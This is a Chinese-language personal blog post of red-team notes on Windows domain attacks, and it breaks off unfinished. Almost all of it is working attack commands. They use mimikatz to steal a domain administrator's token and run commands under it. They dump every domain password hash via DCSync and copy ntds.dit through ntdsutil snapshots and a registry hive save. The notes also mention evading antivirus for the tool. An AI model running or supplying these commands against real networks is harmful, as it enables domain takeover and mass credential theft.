Windows域内一些笔记

域内窃取票据

有时候环境比较恶劣，目标机器无法上线，所以无法直接使用cs来窃取进程的token信息。条件允许的情况下，上传mimikatz，至于免杀就只有自行想其他办法，然后选个合适的时间登录远程桌面进行操作。

原文链接：https://paper.seebug.org/1669

直接上手操作，原理我也看不明白的。

# 鼠标右键以管理员权限运行mimikatz
# 然后提升到debug权限
privilege::debug

# 查看当前权限
token::whoami
# 列出token
token::list
# 窃取域管token，键入该指令会自动寻找域管的进程信息，并窃取其token
token::elevate /admin
# 窃取token，需要指定进程id，窃取域管token则需要一个域管进程的进程id
token::elevate /id:xxx 
# 这时候再使用上面查看权限的命令确认是否窃取成功，如果窃取成功，就可以进行下一步操作，如导出域内hash等。
# 导出域内全部hash
lsadump::dcsync /all /csv 
# 导出指定域用户hash
lsadump::dcsync /domain:test.local /user:admin 
# 使用窃取的token运行指定命令，tokenid 需要使用上述列出token命令查看
token::run /process:whoami /id:tokenid 
# 清除窃取的票据信息
token::revert

导出域内hash

方式有很多，记录几个平时常用的。

所记录的方式均需要域管理员权限。

ntdsutil导出:

# 备注版
(1) 查询当前快照列表
ntdsutil snapshot "List All" quit quit
(2) 查询已挂载的快照列表
ntdsutil snapshot "List Mounted" quit quit
(3) 创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
(4) 挂载快照
ntdsutil snapshot "mount xxxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxx" quit quit
(5) 复制ntds.dit
copy C:\$SNAP_202303040525_VOLUMEC$\windows\NTDS\ntds.dit c:\users\public\downloads\ntds.dit
(6) 卸载快照:
ntdsutil snapshot \"unmount xxxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxx\" quit quit
(7) 删除快照
ntdsutil snapshot \"delete xxxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxx\" quit quit
注册表提取
reg save hklm\system system.hiv

麻辣个巴子，代码块鼠标定位不进去了，下次再补充。